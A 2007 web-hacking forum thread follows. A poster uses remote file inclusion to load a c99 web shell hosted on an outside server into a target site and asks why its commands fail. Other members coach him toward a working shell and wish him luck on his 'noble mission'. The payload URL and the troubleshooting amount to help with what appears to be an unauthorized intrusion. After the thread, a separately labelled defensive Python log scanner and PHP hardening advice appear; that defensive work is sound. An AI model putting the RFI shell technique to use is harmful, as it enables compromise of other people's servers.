HellBound Hackers | Computer General | Web hacking

c99 hack/problem


Posted on 04-05-07 19:18
ok I have found a RFI exploit on this site and whatever. I have the shell coming up because this worked: http://www.site.com/index.php?http://www.jhn.com/c99.txt
So the shell comes up and lists all the files and directories.
All so good so far until i try to click on a file/folder or run a command and this comes up:
Code
Warning: include(What ever i'm accessing) [function.include]: failed to open stream: No such file or directory in /var/www/htdocs/ on line 207

Warning: include() [function.include]: Failed opening '(what ever i'm accessing)' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/ on line 207


or something like that

I tried to upload the shell in the htdocs dir but it always says "file cannot be uploaded from * to /var/www/htdocs"

Any insight in what is going on?


RE: c99 hack/problem
Posted on 04-05-07 20:03
Hehe I remember making the same mistake back on my 1st attempt to RFI :)

U c what u did is exploit a get variable right? U used that variable to INCLUDE ur code to the victim's server.

However, when u click on a folder there are also many get variables from ur shell which indicate the file, command or blah blah u wish to execute etc...

Notice however, that smth is missing :D U gotta find it now hehe :)

PS: Happy hacking ^^



RE: c99 hack/problem
Posted on 04-05-07 20:22
OoO ok i sorta get what you are saying so i have to sorta customize the shell for that site
I'll try that later on


RE: c99 hack/problem
Posted on 04-05-07 20:26
No u don't have to customize anything :P
Just don't forget the variable u used to include the shell else when trying to execute any commands, ur shell will not be included at all (da error) :)

If u still don't get it I'll reply with full explanation later. For now i gtg :(

RE: c99 hack/problem
Posted on 04-05-07 20:39
ok i understand about 80%...i'll give it a try in about 2 hours or so...but thanx




Edited by on 04-05-07 20:39

RE: c99 hack/problem
Posted on 04-05-07 22:06
well i know what is wrong but i don't know how to make it work still :angry:


RE: c99 hack/problem
Posted on 04-05-07 22:54
Well, I'm not the kind of person who answers questions with riddles so I'm going to break it down to you:

Here is an example of a URL vulnerable to RFI:

Code
http://www.website.com/index.php?page=about.htm




In this example "page" is being included. Also you see "page" equals "about.htm" (so about.htm is included).
If the code doesn't limit the things that can be filled in behind ?page= you can include any file you want. This is where your shell comes in ;)

Now if you look at the example URL and you understand what's happening you will notice that you forgot one crucial thing...
The ?page= part !

This should help you fulfill your noble mission :)
Good luck!

S-H


RE: c99 hack/problem
Posted on 04-05-07 23:35
i get that part but the and stuff because i got the shell to show all the files and folders....it's just every time i try to run a cmd or go to a file/folder the error comes up....
plus the site i'm hacking is http://www.site.com/index.php?http://shell

it does not have nothing like the page= stuff it is just
index.php?RFI




Edited by on 06-05-07 00:54
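
Defender-side view of the requests discussed in this thread, as an added example that is not part of any post: a Python log check that flags a remote URL supplied either as a parameter value (`?page=http://...`) or as the bare query string (`index.php?http://...`). The log lines, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in Apache access-log style (not taken from the thread).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Apr/2007:19:18:02 +0000] "GET /index.php?page=about.htm HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Apr/2007:19:18:40 +0000] "GET /index.php?page=http://files.example/s.txt HTTP/1.1" 200 48211',
    '203.0.113.9 - - [05/Apr/2007:19:19:05 +0000] "GET /index.php?http://files.example/s.txt HTTP/1.1" 200 48211',
    '203.0.113.9 - - [05/Apr/2007:19:19:30 +0000] "GET /index.php?page=hTTp%3A%2F%2Ffiles.example%2Fs.txt HTTP/1.1" 200 48211',
    '198.51.100.7 - - [05/Apr/2007:19:20:11 +0000] "GET /search.php?q=what+is+http HTTP/1.1" 200 901',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that *starts* with a remote scheme; case-insensitive on purpose.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def remote_include_candidates(target):
    """Return (parameter, value) pairs where the value is a remote URL.

    A bare query string with no name= part is reported as '<query>'.
    """
    query = target.partition('?')[2]
    found = []
    # parse_qsl percent-decodes names and values, so encoded schemes are caught.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_RE.match(value):
            found.append((name, value))
        elif value == '' and REMOTE_RE.match(name):
            # No '=' in the pair: the whole query string is the URL.
            found.append(('<query>', name))
    return found


def scan(lines):
    """Return (client_ip, parameter, value) for every suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client = line.split(' ', 1)[0]
        for param, value in remote_include_candidates(m.group(1)):
            hits.append((client, param, value))
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A match shows only that a remote URL was supplied; whether it was included depends on the application. Pair the alert with a fixed allowlist of includable pages and `allow_url_include = Off` in php.ini.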